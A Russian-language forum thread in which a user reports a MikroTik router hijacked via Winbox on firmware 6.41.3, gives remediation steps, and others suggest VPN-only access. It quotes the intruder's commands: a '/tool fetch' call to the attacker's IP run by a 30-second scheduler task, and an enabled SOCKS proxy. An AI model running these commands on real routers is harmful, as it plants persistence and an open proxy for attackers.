Перейти до

Проверяем свои борды. опять ВЗЛОМ Mikrotik


Рекомендованные сообщения

Без лишних подробностей. ссыль

Очередной раз через уязвимость winbox на одной из последних прошивках 6.41.3 якобы безопасных был взломан микротик на раз-два!
Суть проблемы — вход злоумышленника через winbox с ip 95.154.216.160 абсолютно без проблем, в моём случае 2 неудачных попытки входа и 3-й успешный вход под второй учёткой со сложным паролем нигде не засвеченным.
Под этим логином не входили никогда, создана учётка про запас на случай потери основного пароля.
 

Далее после входа злоумышленник на микротике:

1. Создаёт скрипт script1_ 

/tool fetch address=95.154.216.160 port=2008 src-path=/mikrotik.php mode=http


2. Создаёт в планировщике задание каждые 30 секунд выполнять скрипт script1_
3. Включает IP-> Socks

/ip socks> print enabled: yes port: 4145 connection-idle-timeout: 2m max-connections: 200


Самое интересное то, что файл mikrotik.php пустой, либо это значит что это только предупреждение об уязвимости, либо всётаки конфиг ушёл в английское королевство.

Пока непонятно как такое могло быть?!

Что делать ели Ваш микротик взломан таким образом?

Надо изначально было не давать доступ к winbox из внешней сети, разрешить только с определённых айпи.

Удалить скрипт и задание планировщика.

Выключить носки) Ip->Socks

Менять пароли

Шиться новой прошивкой, но не факт что она уже есть с фиксом)

  • Thanks 2
Ссылка на сообщение
Поделиться на других сайтах

Я не понимаю вообще зачем давать доступ на авторизацию винбокс/хттп в микротике извне? Подымаете на микротике vpn - конектитесь на него, с него уже ходите по сети своей.

Ссылка на сообщение
Поделиться на других сайтах
Только что, Kto To сказал:

Я не понимаю вообще зачем давать доступ на авторизацию винбокс/хттп в микротике извне? Подымаете на микротике vpn - конектитесь на него, с него уже ходите по сети своей.

Спору нет, методики взлома давно уже известны, но не все обновляются до фиксовых версий...

Ссылка на сообщение
Поделиться на других сайтах
16 минут назад, Kto To сказал:

Я не понимаю вообще зачем давать доступ на авторизацию винбокс/хттп в микротике извне? Подымаете на микротике vpn - конектитесь на него, с него уже ходите по сети своей.

Это на уровне админа, но их же домохозяйкам ставят. 

Ссылка на сообщение
Поделиться на других сайтах

Создайте аккаунт или войдите в него для комментирования

Вы должны быть пользователем, чтобы оставить комментарий

Создать аккаунт

Зарегистрируйтесь для получения аккаунта. Это просто!

Зарегистрировать аккаунт

Вхід

Уже зарегистрированы? Войдите здесь.

Войти сейчас
  • Зараз на сторінці   0 користувачів

    Немає користувачів, що переглядають цю сторінку.

  • Схожий контент

×
×
  • Створити нове...